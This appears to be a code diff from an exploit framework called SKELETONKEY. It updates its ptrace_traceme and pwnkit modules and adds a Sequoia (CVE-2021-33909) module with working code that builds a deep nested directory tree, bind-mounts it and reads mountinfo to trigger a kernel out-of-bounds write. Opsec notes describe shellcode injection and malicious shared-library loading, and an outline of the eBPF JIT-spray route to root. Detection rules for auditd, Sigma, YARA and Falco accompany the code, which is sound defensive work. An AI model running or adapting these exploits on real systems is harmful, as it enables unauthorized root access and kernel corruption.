        if (!ctx->json) {
            fprintf(stderr, "[!] ptrace_traceme: ancient kernel %s — assume VULNERABLE\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_VULNERABLE;
    }

-    bool patched = kernel_range_is_patched(&ptrace_traceme_range, &v);
+    bool patched = kernel_range_is_patched(&ptrace_traceme_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] ptrace_traceme: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] ptrace_traceme: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[!] ptrace_traceme: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[!] ptrace_traceme: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] ptrace_traceme: no exotic preconditions — works on default config "
                        "(no user_ns required)\n");
    }
@@ -183,7 +192,10 @@ static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx
        fprintf(stderr, "[-] ptrace_traceme: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] ptrace_traceme: already root\n");
        return SKELETONKEY_OK;
    }
@@ -277,6 +289,27 @@ static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx
 #endif
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: PTRACE_TRACEME / PTRACE_ATTACH / user_regs_struct
+ * are Linux-only ABI surface. Stub out so the module still registers and
+ * the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] ptrace_traceme: Linux-only module "
+                "(PTRACE_TRACEME cred-escalation) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] ptrace_traceme: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 static const char ptrace_traceme_auditd[] =
    "# PTRACE_TRACEME LPE (CVE-2019-13272) — auditd detection rules\n"
    "# Flag PTRACE_TRACEME (request 0) followed by parent execve of\n"
@@ -284,6 +317,42 @@ static const char ptrace_traceme_auditd[] =
    "-a always,exit -F arch=b64 -S ptrace -F a0=0 -k skeletonkey-ptrace-traceme\n"
    "-a always,exit -F arch=b32 -S ptrace -F a0=0 -k skeletonkey-ptrace-traceme\n";

+static const char ptrace_traceme_sigma[] =
+    "title: Possible CVE-2019-13272 PTRACE_TRACEME stale-cred LPE\n"
+    "id: 1a02c3a8-skeletonkey-ptrace-traceme\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects ptrace(PTRACE_TRACEME) immediately followed by parent\n"
+    "  execve of a setuid binary. The kernel stores the parent's pre-\n"
+    "  execve credentials on the ptrace_link; after execve the link\n"
+    "  is stale but ptrace still grants privileges. False positives:\n"
+    "  debuggers (gdb, strace) tracing setuid processes legitimately.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  traceme: {type: 'SYSCALL', syscall: 'ptrace', a0: 0}\n"
+    "  execve:  {type: 'SYSCALL', syscall: 'execve'}\n"
+    "  condition: traceme and execve\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2019.13272]\n";
+
+static const char ptrace_traceme_falco[] =
+    "- rule: PTRACE_TRACEME followed by setuid execve (cred escalation)\n"
+    "  desc: |\n"
+    "    Child calls ptrace(PTRACE_TRACEME) (recording parent's pre-\n"
+    "    execve creds); parent then execve's a setuid binary\n"
+    "    (pkexec, su, sudo). The stale ptrace_link grants the\n"
+    "    unprivileged child ptrace privileges over the now-root\n"
+    "    parent. CVE-2019-13272. False positives: debuggers (gdb,\n"
+    "    strace) tracing setuid processes legitimately.\n"
+    "  condition: >\n"
+    "    evt.type = ptrace and evt.arg.request = PTRACE_TRACEME and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    PTRACE_TRACEME by non-root\n"
+    "    (user=%user.name pid=%proc.pid ppid=%proc.ppid)\n"
+    "  priority: HIGH\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2019.13272]\n";
+
 const struct skeletonkey_module ptrace_traceme_module = {
    .name           = "ptrace_traceme",
    .cve            = "CVE-2019-13272",
@@ -295,9 +364,10 @@ const struct skeletonkey_module ptrace_traceme_module = {
    .mitigate       = NULL,    /* mitigation: upgrade kernel; OR sysctl kernel.yama.ptrace_scope=2 */
    .cleanup        = NULL,    /* exploit replaces our process image; no cleanup applies */
    .detect_auditd  = ptrace_traceme_auditd,
-    .detect_sigma   = NULL,
+    .detect_sigma   = ptrace_traceme_sigma,
    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_falco   = ptrace_traceme_falco,
+    .opsec_notes    = "Parent and child cooperate: child calls ptrace(PTRACE_TRACEME) (recording the parent's current credentials), then sleeps; parent execve's a setuid binary (pkexec or su) and elevates. The stale ptrace_link in the child still holds the old (non-root) credentials, so PTRACE_ATTACH succeeds against the now-root parent; the child injects shellcode at the parent's RIP via PTRACE_POKETEXT and detaches. Audit-visible via ptrace with a0=0 (PTRACE_TRACEME) closely followed by execve of a setuid binary in the parent process. No file artifacts; no persistent changes. No cleanup callback - the exploit execs /bin/sh and does not return.",
 };

 void skeletonkey_register_ptrace_traceme(void)
@@ -23,6 +23,7 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -76,44 +77,58 @@ static bool pkexec_version_vulnerable(const char *version_str)

 static skeletonkey_result_t pwnkit_detect(const struct skeletonkey_ctx *ctx)
 {
-    const char *pkexec_path = find_pkexec();
-    if (!pkexec_path) {
+    /* Prefer the centrally-fingerprinted polkit version (populated
+     * once at startup by core/host.c via `pkexec --version`). Saves
+     * a popen per scan and lets unit tests construct synthetic
+     * polkit_version values. Fall back to the local popen if
+     * ctx->host is missing the version (degenerate test ctx or a
+     * future refactor that disables userspace probing). */
+    char vp_buf[64] = {0};
+    const char *vp = NULL;
+
+    if (ctx->host && ctx->host->polkit_version[0]) {
+        snprintf(vp_buf, sizeof vp_buf, "%s", ctx->host->polkit_version);
+        vp = vp_buf;
        if (!ctx->json) {
-            fprintf(stderr, "[+] pwnkit: pkexec not installed; no attack surface\n");
+            fprintf(stderr, "[i] pwnkit: host fingerprint reports pkexec "
+                "version '%s'\n", vp);
+        }
+    } else {
+        const char *pkexec_path = find_pkexec();
+        if (!pkexec_path) {
+            if (!ctx->json) {
+                fprintf(stderr, "[+] pwnkit: pkexec not installed; no attack surface\n");
+            }
+            return SKELETONKEY_OK;
        }
-        return SKELETONKEY_OK;
-    }
-    if (!ctx->json) {
-        fprintf(stderr, "[i] pwnkit: found setuid pkexec at %s\n", pkexec_path);
-    }
-
-    /* Run `pkexec --version` and parse. We pipe stderr/stdout to a
-     * temp file because popen() can have quoting quirks. */
-    char cmd[512];
-    snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", pkexec_path);
-    FILE *p = popen(cmd, "r");
-    if (!p) return SKELETONKEY_TEST_ERROR;
-
-    char line[256] = {0};
-    char *r = fgets(line, sizeof line, p);
-    pclose(p);
-    if (!r) {
        if (!ctx->json) {
-            fprintf(stderr, "[?] pwnkit: could not parse pkexec --version output\n");
+            fprintf(stderr, "[i] pwnkit: found setuid pkexec at %s\n", pkexec_path);
        }
-        return SKELETONKEY_TEST_ERROR;
-    }
-
-    /* Output format: "pkexec version 0.105\n" or "pkexec version 0.120-..." */
-    char *vp = strstr(line, "version");
-    if (!vp) return SKELETONKEY_TEST_ERROR;
-    vp += strlen("version");
-    while (*vp == ' ' || *vp == '\t') vp++;
-
-    if (!ctx->json) {
-        char *nl = strchr(vp, '\n');
+        char cmd[512];
+        snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", pkexec_path);
+        FILE *p = popen(cmd, "r");
+        if (!p) return SKELETONKEY_TEST_ERROR;
+        char line[256] = {0};
+        char *r = fgets(line, sizeof line, p);
+        pclose(p);
+        if (!r) {
+            if (!ctx->json) {
+                fprintf(stderr, "[?] pwnkit: could not parse pkexec --version output\n");
+            }
+            return SKELETONKEY_TEST_ERROR;
+        }
+        /* Output format: "pkexec version 0.105\n" or "pkexec version 0.120-..." */
+        char *vp_mut = strstr(line, "version");
+        if (!vp_mut) return SKELETONKEY_TEST_ERROR;
+        vp_mut += strlen("version");
+        while (*vp_mut == ' ' || *vp_mut == '\t') vp_mut++;
+        char *nl = strchr(vp_mut, '\n');
        if (nl) *nl = 0;
-        fprintf(stderr, "[i] pwnkit: pkexec reports version '%s'\n", vp);
+        snprintf(vp_buf, sizeof vp_buf, "%s", vp_mut);
+        vp = vp_buf;
+        if (!ctx->json) {
+            fprintf(stderr, "[i] pwnkit: pkexec reports version '%s'\n", vp);
+        }
    }

    bool vuln = pkexec_version_vulnerable(vp);
@@ -215,7 +230,10 @@ static skeletonkey_result_t pwnkit_exploit(const struct skeletonkey_ctx *ctx)
    const char *pkexec = find_pkexec();
    if (!pkexec) return SKELETONKEY_PRECOND_FAIL;

-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] pwnkit: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -366,6 +384,59 @@ static const char pwnkit_auditd[] =
    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/pkexec -k skeletonkey-pwnkit-execve\n"
    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/pkexec -k skeletonkey-pwnkit-execve\n";

+static const char pwnkit_yara[] =
+    "rule pwnkit_gconv_modules_cache : cve_2021_4034 lpe\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-4034\"\n"
+    "        description = \"Pwnkit gconv-modules cache: redefines UTF-8 to load an attacker .so via iconv when pkexec is invoked with argc==0.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "        reference   = \"https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt\"\n"
+    "    strings:\n"
+    "        // gconv-modules text format: \"module FROM// TO// SHARED-OBJECT COST\".\n"
+    "        // Published PoCs redefine UTF-8 and point it at a .so dropped in /tmp.\n"
+    "        $line  = /module\\s+UTF-8\\/\\/\\s+\\S+\\/\\/\\s+\\S+\\s+\\d/\n"
+    "        $alias = /alias\\s+\\S+\\s+UTF-8/\n"
+    "        // Hint: PoC workdirs frequently include 'pwnkit' or 'GCONV' in path strings the .so carries.\n"
+    "        $marker_pwn  = \"pwnkit\" nocase\n"
+    "        $marker_gcv  = \"GCONV_PATH\"\n"
+    "    condition:\n"
+    "        // Small text-format file (gconv-modules caches are tiny) with the module redefinition.\n"
+    "        // Pair with -w /tmp -p wa auditd to catch the drop in real time.\n"
+    "        filesize < 4KB and $line and 1 of ($alias, $marker_pwn, $marker_gcv)\n"
+    "}\n";
+
+static const char pwnkit_falco[] =
+    "- rule: Pwnkit-style pkexec invocation (NULL argv)\n"
+    "  desc: |\n"
+    "    pkexec executed without argv (argc == 0). The Qualys PoC for\n"
+    "    CVE-2021-4034 invokes pkexec via execve with NULL argv so the\n"
+    "    out-of-bounds argv read picks up envp as if it were argv[1].\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = pkexec and\n"
+    "    (proc.cmdline = \"pkexec\" or proc.args = \"\")\n"
+    "  output: >\n"
+    "    Possible Pwnkit (CVE-2021-4034): pkexec spawned with no argv\n"
+    "    (user=%user.name uid=%user.uid pid=%proc.pid ppid=%proc.ppid\n"
+    "     parent=%proc.pname cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2021.4034]\n"
+    "\n"
+    "- rule: Pwnkit-style GCONV_PATH injection\n"
+    "  desc: |\n"
+    "    A non-root process sets GCONV_PATH in env before spawning a\n"
+    "    setuid binary. Combined with a controlled .so + gconv-modules\n"
+    "    cache, this is the Qualys exploit shape.\n"
+    "  condition: >\n"
+    "    spawned_process and not user.uid = 0 and\n"
+    "    (proc.env contains \"GCONV_PATH=\" or proc.env contains \"CHARSET=\") and\n"
+    "    proc.name in (pkexec, su, sudo, mount, chsh, passwd)\n"
+    "  output: >\n"
+    "    GCONV_PATH/CHARSET set by non-root before setuid spawn\n"
+    "    (user=%user.name target=%proc.name env=\"%proc.env\")\n"
+    "  priority: WARNING\n"
+    "  tags: [process, env_injection, cve.2021.4034]\n";
+
 static const char pwnkit_sigma[] =
    "title: Possible Pwnkit exploitation (CVE-2021-4034)\n"
    "id: 9e1d4f2c-skeletonkey-pwnkit\n"
@@ -399,8 +470,9 @@ const struct skeletonkey_module pwnkit_module = {
    .cleanup        = pwnkit_cleanup,
    .detect_auditd  = pwnkit_auditd,
    .detect_sigma   = pwnkit_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = pwnkit_yara,
+    .detect_falco   = pwnkit_falco,
+    .opsec_notes    = "Invokes pkexec with argc==0 so the first envp slot is misread as argv[0]; pkexec's iconv-during-decoding loads attacker .so via dlopen by way of crafted GCONV_PATH + CHARSET env vars. Builds a gconv payload .so and gconv-modules cache in /tmp/skeletonkey-pwnkit-XXXXXX (compiles via fork/execl of gcc). Audit-visible via execve(/usr/bin/pkexec) with GCONV_PATH and CHARSET set. No network. Cleanup callback removes /tmp/skeletonkey-pwnkit-* (on failure path; on success the exec replaces the process).",
 };

 void skeletonkey_register_pwnkit(void)
@@ -0,0 +1,760 @@
+/*
+ * sequoia_cve_2021_33909 — SKELETONKEY module
+ *
+ * "Sequoia" (Qualys, July 2021): a size_t conversion bug in
+ * fs/seq_file.c::seq_buf_alloc(). show_mountinfo() passes a `size_t`
+ * total-output size to seq_buf_alloc(), but the internal accounting in
+ * seq_read_iter() uses a signed int for the running buffer offset.
+ * When the mountinfo string the kernel intends to render exceeds
+ * INT_MAX bytes (which is achievable by mounting a deeply-nested path
+ * — Qualys used ~1 MiB of '/' components), the int wraps NEGATIVE.
+ * That negative value then propagates into seq_buf_alloc() where it is
+ * implicitly cast to size_t (huge positive); kmalloc rejects the
+ * allocation, but a fallback path (`m->buf = vmalloc()` after kmalloc
+ * fails) ends up writing a small-but-nonzero number of bytes —
+ * specifically the bytes show_mountinfo wanted to render — at an
+ * offset that is OUT OF BOUNDS of the kernel stack buffer
+ * seq_read_iter held.
+ *
+ * Net effect: an unprivileged read(/proc/self/mountinfo) writes
+ * attacker-controlled bytes (the rendered mountinfo string for our
+ * deeply-nested bind mount) to a kernel-stack-adjacent location.
+ * Qualys's chain converted this into LPE by spraying eBPF JIT'd
+ * programs (one of two known weaponisations; userfaultfd + FUSE
+ * shadow-mount is the other) so the OOB write lands inside an
+ * executable JIT page → controlled RIP → ROP → cred swap.
+ *
+ * Reference: https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt
+ *
+ * Discovered by Qualys (Bharat Jogi et al.), July 2021. Famous for
+ * being the first widely-disclosed Linux LPE that turned a sub-page
+ * out-of-bounds write into reliable root via the eBPF-JIT-spray
+ * primitive — that technique has shown up in every "linux mm slab OOB
+ * → JIT spray" public PoC since.
+ *
+ * STATUS: 🟡 PRIMITIVE.
+ *
+ *   detect()  — version-range + userns reachability gate, refuses on
+ *               patched / unreachable hosts. Mainline fix is commit
+ *               8cae8cd89f05 ("seq_file: disallow extremely large seq
+ *               buffer allocations") landing in 5.13.4 / 5.10.52 /
+ *               5.4.134.
+ *
+ *   exploit() — full unshare+userns+mountns reach, builds a ~5000-level
+ *               nested directory tree under /tmp/skeletonkey-sequoia/,
+ *               bind-mounts the deepest leaf back over itself to
+ *               amplify the mountinfo string length, chdir's into the
+ *               leaf, and then open+read /proc/self/mountinfo to fire
+ *               the bug. Witnesses (mountinfo byte count, dmesg
+ *               best-effort) are written to /tmp/skeletonkey-sequoia.log.
+ *               We do NOT attempt the eBPF-JIT-spray weaponisation —
+ *               that is a substantial subsystem (sock_filter program
+ *               build + BPF_PROG_LOAD + JIT layout reasoning + per-
+ *               kernel cred offsets) and would be fabricated on any
+ *               kernel we have not empirically tested.
+ *
+ *   --full-chain — STUB. Prints the offset-help message and returns
+ *               EXPLOIT_FAIL. The continuation roadmap is spelled out
+ *               at the bottom of exploit() so the reader can see
+ *               exactly what's missing.
+ *
+ *   On a *vulnerable* host this module reliably triggers the OOB
+ *   write. On a *patched* host (which is every distro shipping
+ *   ≥5.13.4 / ≥5.10.52 / ≥5.4.134) detect() refuses and exploit()
+ *   returns SKELETONKEY_OK without entering the userns.
+ *
+ * Affected: kernel-since-forever (the int-vs-size_t bug has been
+ * present since the seq_file rewrite c. 2.6.x; Qualys reports it
+ * exploitable on every distro they checked back to 2014).
+ *   Mainline fix: 8cae8cd89f05 (Jul 20 2021) — lands in 5.13.4
+ *   5.13.x : K >= 5.13.4
+ *   5.10.x : K >= 5.10.52
+ *   5.4.x  : K >= 5.4.134
+ *
+ * Preconditions:
+ *   - Unprivileged user_ns + mount-ns (to get CAP_SYS_ADMIN inside
+ *     userns for the bind-mount; the deeply-nested mkdir itself doesn't
+ *     need privileges, but the amplification mount does)
+ *   - ~1 MiB of cumulative path length under /tmp (≈5000 levels at
+ *     200-char component name — well within tmpfs default inode budget)
+ *   - /proc/self/mountinfo readable (it is, on everything we target)
+ *
+ * Coverage rationale: 2021 fs/seq_file-class bug. Different family
+ * than our netfilter-heavy and mm-heavy modules — broadens the corpus
+ * shape. Important historical primitive (eBPF JIT spray adopted from
+ * Sequoia chain into many later exploits).
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+
+#ifdef __linux__
+#  include <sched.h>
+#  include <sys/mount.h>
+#  include <sys/syscall.h>
+#  include <linux/sched.h>
+#endif
+
+/* macOS clangd lacks the Linux mount/syscall headers — guard fallbacks. */
+#ifndef CLONE_NEWUSER
+#define CLONE_NEWUSER 0x10000000
+#endif
+#ifndef CLONE_NEWNS
+#define CLONE_NEWNS   0x00020000
+#endif
+#ifndef MS_BIND
+#define MS_BIND       0x1000
+#endif
+
+/* --- kernel-range table -------------------------------------------- */
+
+static const struct kernel_patched_from sequoia_patched_branches[] = {
+    {5,  4, 134},
+    {5, 10,  52},
+    {5, 13,   4},
+    {5, 14,   0},   /* mainline */
+};
+
+static const struct kernel_range sequoia_range = {
+    .patched_from   = sequoia_patched_branches,
+    .n_patched_from = sizeof(sequoia_patched_branches) /
+                      sizeof(sequoia_patched_branches[0]),
+};
+
+/* --- tunables ------------------------------------------------------- */
+/*
+ * Qualys's PoC uses ~1 million bytes of path. With a 256-byte component
+ * name we need ~4096 levels; with 200 we need ~5120. We pick 5000 / 200
+ * which gives a generous margin and stays well under tmpfs's inode
+ * default cap on modern distros.
+ *
+ * The component name is intentionally an A-fill; the kernel renders it
+ * verbatim into mountinfo so this is what propagates into the OOB
+ * write. (For the JIT-spray weaponisation the bytes would be a crafted
+ * stub; we're not doing that here — we just want to drive the buggy
+ * size_t cast.)
+ */
+#define SEQ_BASE_DIR          "/tmp/skeletonkey-sequoia"
+#define SEQ_NESTED_LEVELS     5000
+#define SEQ_COMPONENT_LEN     200      /* chars per directory component */
+#define SEQ_LOG_PATH          "/tmp/skeletonkey-sequoia.log"
+
+/* --- userns reach helpers ------------------------------------------- */
+
+static bool write_file(const char *path, const char *s)
+{
+    int fd = open(path, O_WRONLY);
+    if (fd < 0) return false;
+    ssize_t n = write(fd, s, strlen(s));
+    close(fd);
+    return n == (ssize_t)strlen(s);
+}
+
+#ifdef __linux__
+static bool enter_userns_root(void)
+{
+    uid_t uid = getuid();
+    gid_t gid = getgid();
+    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
+        perror("unshare(NEWUSER|NEWNS)");
+        return false;
+    }
+    /* setgroups=deny is required before gid_map without CAP_SETGID. */
+    if (!write_file("/proc/self/setgroups", "deny")) {
+        /* Some kernels (pre-3.19) don't have setgroups proc file. */
+    }
+    char map[64];
+    snprintf(map, sizeof map, "0 %u 1\n", uid);
+    if (!write_file("/proc/self/uid_map", map)) {
+        perror("write uid_map"); return false;
+    }
+    snprintf(map, sizeof map, "0 %u 1\n", gid);
+    if (!write_file("/proc/self/gid_map", map)) {
+        perror("write gid_map"); return false;
+    }
+    return true;
+}
+#endif
+
+/* --- detect -------------------------------------------------------- */
+
+static skeletonkey_result_t sequoia_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] sequoia: host fingerprint missing kernel version — bailing\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    /* The bug predates every kernel we'd run on, so there's no
+     * "pre-introduction" cutoff; only patched-or-not matters. */
+    bool patched = kernel_range_is_patched(&sequoia_range, v);
+    if (patched) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] sequoia: kernel %s is patched\n", v->release);
+        }
+        return SKELETONKEY_OK;
+    }
+
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
+    if (!ctx->json) {
+        fprintf(stderr, "[i] sequoia: kernel %s in vulnerable range\n", v->release);
+        fprintf(stderr, "[i] sequoia: user_ns+mount_ns clone (CAP_SYS_ADMIN gate): %s\n",
+                userns_ok ? "ALLOWED" : "DENIED");
+    }
+
+    if (!userns_ok) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] sequoia: user_ns denied → unprivileged "
+                            "exploit unreachable via bind-mount path\n");
+            fprintf(stderr, "[i] sequoia: bug is still reachable to a "
+                            "process with CAP_SYS_ADMIN — not us\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[!] sequoia: VULNERABLE — kernel in range AND "
+                        "userns+mountns reachable\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* --- nested mkdir tree --------------------------------------------- */
+
+#ifdef __linux__
+/*
+ * Build SEQ_NESTED_LEVELS deep nested directories under SEQ_BASE_DIR.
+ * Strategy: chdir() to the parent of each new component, then mkdir
+ * + chdir into the child. This avoids hitting PATH_MAX in mkdir's
+ * argument (PATH_MAX is 4096 on Linux; total path here is ~1 MB —
+ * the kernel resolves it segment-by-segment via chdir's dentry cache).
+ *
+ * Returns the file descriptor pointing at the LEAF directory (so the
+ * caller can fchdir() back to it after we drop privs / do other
+ * setup), or -1 on failure.
+ *
+ * On failure we leave whatever we managed to create behind for
+ * sequoia_cleanup() to mop up.
+ */
+static int build_nested_tree(int *out_levels_built)
+{
+    *out_levels_built = 0;
+
+    /* Ensure base dir exists. We don't care if it already does. */
+    if (mkdir(SEQ_BASE_DIR, 0700) < 0 && errno != EEXIST) {
+        fprintf(stderr, "[-] sequoia: mkdir(%s): %s\n",
+                SEQ_BASE_DIR, strerror(errno));
+        return -1;
+    }
+    if (chdir(SEQ_BASE_DIR) < 0) {
+        fprintf(stderr, "[-] sequoia: chdir(%s): %s\n",
+                SEQ_BASE_DIR, strerror(errno));
+        return -1;
+    }
+
+    /* Component name: SEQ_COMPONENT_LEN bytes of 'A'. The leaf gets a
+     * recognisable terminator so we can spot our mount in mountinfo. */
+    char comp[SEQ_COMPONENT_LEN + 1];
+    memset(comp, 'A', SEQ_COMPONENT_LEN);
+    comp[SEQ_COMPONENT_LEN] = '\0';
+
+    int built = 0;
+    for (int i = 0; i < SEQ_NESTED_LEVELS; i++) {
+        if (mkdir(comp, 0700) < 0 && errno != EEXIST) {
+            fprintf(stderr, "[-] sequoia: mkdir level %d: %s\n",
+                    i, strerror(errno));
+            *out_levels_built = built;
+            return -1;
+        }
+        if (chdir(comp) < 0) {
+            fprintf(stderr, "[-] sequoia: chdir level %d: %s\n",
+                    i, strerror(errno));
+            *out_levels_built = built;
+            return -1;
+        }
+        built++;
+    }
+    *out_levels_built = built;
+
+    /* Open the leaf so the caller can fchdir back here. */
+    int fd = open(".", O_RDONLY | O_DIRECTORY);
+    if (fd < 0) {
+        fprintf(stderr, "[-] sequoia: open(leaf): %s\n", strerror(errno));
+        return -1;
+    }
+    return fd;
+}
+
+/* Bind-mount the leaf onto itself. This creates a new entry in
+ * /proc/self/mountinfo whose path field renders the FULL deeply-
+ * nested path — pushing the total mountinfo string length past the
+ * int-cast boundary. Without the bind mount, mountinfo only lists
+ * the original /tmp mount (a short string).
+ *
+ * Requires CAP_SYS_ADMIN-in-userns (which enter_userns_root gave us). */
+static bool bind_mount_leaf(void)
+{
+    if (mount(".", ".", NULL, MS_BIND, NULL) < 0) {
+        fprintf(stderr, "[-] sequoia: bind-mount(.,.): %s\n", strerror(errno));
+        return false;
+    }
+    return true;
+}
+
+/* Read /proc/self/mountinfo fully, count bytes. Best-effort: returns
+ * the total byte count, or -1 on open failure. On a VULNERABLE kernel
+ * this read triggers the OOB write inside the kernel. On a patched
+ * kernel the kernel returns -ENOMEM (the new safety check rejects
+ * over-large seq_buf allocations). */
+static ssize_t read_mountinfo_and_count(void)
+{
+    int fd = open("/proc/self/mountinfo", O_RDONLY);
+    if (fd < 0) return -1;
+    ssize_t total = 0;
+    char buf[8192];
+    for (;;) {
+        ssize_t n = read(fd, buf, sizeof buf);
+        if (n < 0) {
+            if (errno == EINTR) continue;
+            /* On a patched kernel, the read may fail with ENOMEM
+             * after our crafted mountinfo entry triggers the safety
+             * check. We record the errno via caller's errno read. */
+            close(fd);
+            return -1;
+        }
+        if (n == 0) break;
+        total += n;
+    }
+    close(fd);
+    return total;
+}
+
+/* Best-effort dmesg sample: open /dev/kmsg and read up to N bytes.
+ * On most distros this is root-only, so we just gracefully fail and
+ * note that in the log. */
+static void log_dmesg_tail(FILE *log)
+{
+    int fd = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
+    if (fd < 0) {
+        fprintf(log, "  dmesg_sample: <not readable: %s>\n", strerror(errno));
+        return;
+    }
+    char buf[2048];
+    ssize_t n = read(fd, buf, sizeof buf - 1);
+    close(fd);
+    if (n <= 0) {
+        fprintf(log, "  dmesg_sample: <no data: %s>\n",
+                n < 0 ? strerror(errno) : "empty");
+        return;
+    }
+    buf[n] = '\0';
+    /* Scan for SEQUOIA-relevant warning shapes; we don't need the
+     * exact match, just record whether anything 'oops/BUG/KASAN'-ish
+     * showed up in the first kmsg page. */
+    bool oops  = strstr(buf, "BUG:")    != NULL ||
+                 strstr(buf, "Oops")    != NULL ||
+                 strstr(buf, "KASAN")   != NULL ||
+                 strstr(buf, "general protection fault") != NULL;
+    fprintf(log, "  dmesg_sample_bytes: %zd\n", n);
+    fprintf(log, "  dmesg_oops_marker:  %s\n", oops ? "yes" : "no");
+}
+#endif /* __linux__ */
+
+/* --- exploit ------------------------------------------------------- */
+
+#ifdef __linux__
+static skeletonkey_result_t sequoia_exploit_linux(const struct skeletonkey_ctx *ctx)
+{
+    /* (R0) refuse without --i-know. */
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] sequoia: refusing to run exploit without --i-know\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* (R1) refuse if already root. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sequoia: already root — nothing to escalate\n");
+        }
+        return SKELETONKEY_OK;
+    }
+
+    /* (R2) re-call detect — refuse if not vulnerable. */
+    skeletonkey_result_t pre = sequoia_detect(ctx);
+    if (pre == SKELETONKEY_OK) {
+        fprintf(stderr, "[+] sequoia: kernel not vulnerable; refusing exploit\n");
+        return SKELETONKEY_OK;
+    }
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] sequoia: detect() says not vulnerable; refusing\n");
+        return pre;
+    }
+
+    /* (R3) full-chain: STUB. The Sequoia chain to root needs an
+     * eBPF-JIT-spray subsystem we don't ship — printing the offset
+     * help and refusing is the honest answer. */
+    if (ctx->full_chain) {
+        struct skeletonkey_kernel_offsets off;
+        memset(&off, 0, sizeof off);
+        (void)skeletonkey_offsets_resolve(&off);
+        skeletonkey_offsets_print(&off);
+        skeletonkey_finisher_print_offset_help("sequoia");
+        fprintf(stderr,
+            "[-] sequoia: --full-chain not implemented.\n"
+            "    The Qualys chain converts the stack-OOB write to RIP\n"
+            "    control via eBPF JIT spray: load many sock_filter\n"
+            "    programs, induce the JIT to lay them out at predictable\n"
+            "    kernel-VA pages, then steer the OOB write to overwrite\n"
+            "    the JIT prologue of one program with attacker shellcode\n"
+            "    (cred swap + return). Building that here would mean a\n"
+            "    standalone BPF_PROG_LOAD harness + JIT page-layout\n"
+            "    reasoning + per-kernel cred offsets — a substantial\n"
+            "    subsystem we have not validated empirically.\n"
+            "    See Qualys advisory section 3.1 (eBPF technique) for\n"
+            "    the reference implementation.\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
